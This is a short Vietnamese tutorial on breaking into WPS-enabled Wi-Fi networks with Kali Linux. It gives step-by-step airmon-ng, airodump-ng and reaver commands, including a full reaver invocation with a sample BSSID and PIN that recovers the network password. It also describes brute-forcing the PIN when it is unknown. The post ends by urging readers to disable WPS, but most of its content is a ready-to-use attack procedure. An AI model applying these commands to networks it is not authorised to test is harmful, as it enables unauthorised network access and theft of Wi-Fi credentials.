Bài viết hướng dẫn tấn công Wifi nếu bật WPS. Trong bài viết này tôi đê cập tới hình thức tấn công vào WPS mà đã biết trước mã PIN. Vậy mã PIN Wifi nằm ở đâu :
Vậy sau khi biết được mã PIN của Wifi chúng ta sẽ làm gì ?
Yêu cầu chuẩn bị :
- Kali linux (máy ảo đã cài đặt. Không sử dụng Live CD)
- USB Wifi trong bài viết này tôi sử dụng TP-LINK TL-WN722N
Bước 1: Cắm USB Wifi vào máy. Kết nối vào máy ảo sử dụng Kali Linux. Gõ lệnh iwconfig để kiểm tra. Nếu thấy hiện lên như hình dưới đây là thành công
Bước 2: Bật mode monitor (Mon0) . Sử dụng lệnh airmon-ng start wlan0
Bước 3: sử dụng airo-dump để lấy thông tin về SSID, BSSID, Channel cần tấn công. Mở console gõ command: airodump-ng mon0
Bước 4: sử dụng reaver để tấn công lấy mật khẩu wifi
root@kali:~#reaver -i mon0 -b 10:FE:ED:C4:7A:26 -p 04840954 -c 6 -v-v
- -i : tên card đang monitor ở đây là mon0
- -b : BSSID
- -p: Mã pin đã tìm thấy trên wifi
- -c: kênh ở đây là channel 6
- -vv: xuất ra màn hình
Với kết quả hiện lên như trên ta đã thấy rằng nếu bị lộ PIN thì đặt password có phức tạp ra sao đều không quan trọng nữa. Nếu không biết mã PIN thì các bạn có thể sử dụng phương pháp brute force mã PIN bằng cách bỏ tham số -p và đặt tham số time out ngắt quãng trong quá trình brute force. Bạn đã thấy sự nguy hiểm của mã PIN chưa ? Nếu thấy rồi hãy tắt ngay nhé.